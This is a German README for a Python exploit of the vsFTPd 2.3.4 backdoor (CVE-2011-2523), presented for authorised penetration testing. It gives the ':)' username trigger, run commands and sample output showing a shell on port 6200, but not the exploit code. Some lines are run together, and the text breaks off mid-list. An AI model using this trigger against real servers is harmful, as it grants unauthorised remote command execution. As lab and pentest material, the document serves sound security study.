
Python-Exploit für die vsFTPd 2.3.4 Hintertür (CVE-2011-2523), die über einen manipulierten Benutzernamen eine versteckte Shell auf Port 6200 auslöst und so die Ausführung von Befehlen aus der Ferne für autorisierte Penetrationstests ermöglicht.
Dieses Projekt demonstriert die Ausnutzung der vsFTPd 2.3.4 Backdoor-Sicherheitslücke (CVE-2011-2523) mit Python und pwntools.
Haftungsausschluss: Dieses Projekt dient ausschließlich zu Bildungs- und autorisierten Penetrationstestzwecken. Verwenden Sie es NICHT gegen Systeme ohne Genehmigung.
👉 Die anfällige Version von vsFTPd enthält eine bösartige Hintertür, die ausgelöst wird, wenn beim Login ein Benutzername mit :) verwendet wird.
vsFTPd 2.3.4 istUSER hello:))pwntools-BibliothekAbhängigkeiten installieren:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
Das Ziel muss vsFTPd 2.3.4 (anfällige Version) ausführen
Port 6200 muss erreichbar sein
Funktioniert am besten in Laborumgebungen wie: